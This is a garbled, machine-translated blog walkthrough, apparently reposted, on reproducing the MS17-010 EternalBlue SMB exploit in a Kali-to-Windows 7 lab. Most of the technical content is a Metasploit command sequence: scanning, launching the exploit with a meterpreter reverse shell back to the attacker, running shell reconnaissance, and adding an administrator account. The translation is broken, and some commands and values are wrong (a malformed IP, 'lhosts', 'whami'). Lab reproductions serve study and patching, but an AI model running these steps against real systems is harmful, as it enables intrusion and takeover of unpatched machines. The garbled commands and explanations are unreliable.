Ms17-010 Eternal Blue vulnerability reproducibility

Others 2020-01-13 21:49:27 views: null

Ms17-010 Eternal Blue vulnerability reproducibility

0x00 introduce vulnerabilities

Eternal Blue refers to the evening of April 14, 2017, "the eternal blue" using the Windows SMB system vulnerabilities can obtain the highest authority system
May 12, 2017, through the transformation of lawless elements "Eternal Blue" blackmail virus produced wannacry in multiple university campus network, in large enterprise networks and government agencies, private network trick, extortion pay high ransom to decrypt restore files.

0x01 vulnerability principle

Eternal Blue Formula One organization is a loophole in its attack exploits the framework for the SMB service vulnerability that could allow an attacker on the target system can execute arbitrary code.

0x02 Affects Version

Currently known affected versions of Windows include, but are not limited to:
WindowsNT,
Windows2000,
Windows XP,
Windows 2003,
Windows Vista,
Windows 7,
Windows 8,
Windows 2008,
Windows 2008 R2,
Windows Server 2012 SP0.

0x03 vulnerability repair

Microsoft was March 14, 2017 released MS17-010 patch fixes vulnerabilities "eternal blue" attacks, be sure to update the Windows system patches; Always Do not open attachments doc, rtf and other suffixes; intranet exist using the same account, please change the password as soon as possible the case of machine code, not on the computer Make sure the password change is completed, the network operation after the patch is installed, you can download the "eternal blue" tool bug fixes bug fixes

0x04 environmental vulnerability

Attack: Kali-Linux-2019.4-vmware -amd64 (IP: 192.168.139.153)
drone: Windows 7 X64 (IP: 192.168.139.140 )

0x05 reproducible vulnerability

[msfconsole] ----- start msf
[serarch ms17_010] ---- view the template library
[use auxiliary / scanner / smb / smb_ms17_010] - scan hosts to see if there are loopholes
[set rhosts 192.1683.139.140] - Sets scan host ip address
[exploit] - began to attack
[use exploit / windows / smb / ms17_010_eternalblue] - use to attack module
[show options] ---- viewing parameters need to be set
[set rhosts 192.168.139.140] - set the attacked host ip address
[set lhosts 192.168.139.153] - set the attacker ip address
[set threads 512] - set the attacker ip address
[set payload windows / x64 / meterpreter / reverse_tcp] - set the machine to bounce
[exploit] - begin to attack

Here Insert Picture DescriptionHere Insert Picture Description
Here Insert Picture DescriptionHere Insert Picture Description

[shell]
[whami]
[systeminfo]
[ipconfig]
Then you can add the user to modify the password Add to super administrators group

Here Insert Picture DescriptionHere Insert Picture DescriptionHere Insert Picture Description

Chihiro (Spirited Away)
Published 223 original articles · won praise 32 · views 70000 +
Private letter concerns

Guess you like

Origin blog.csdn.net/qq_41901122/article/details/103832915
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com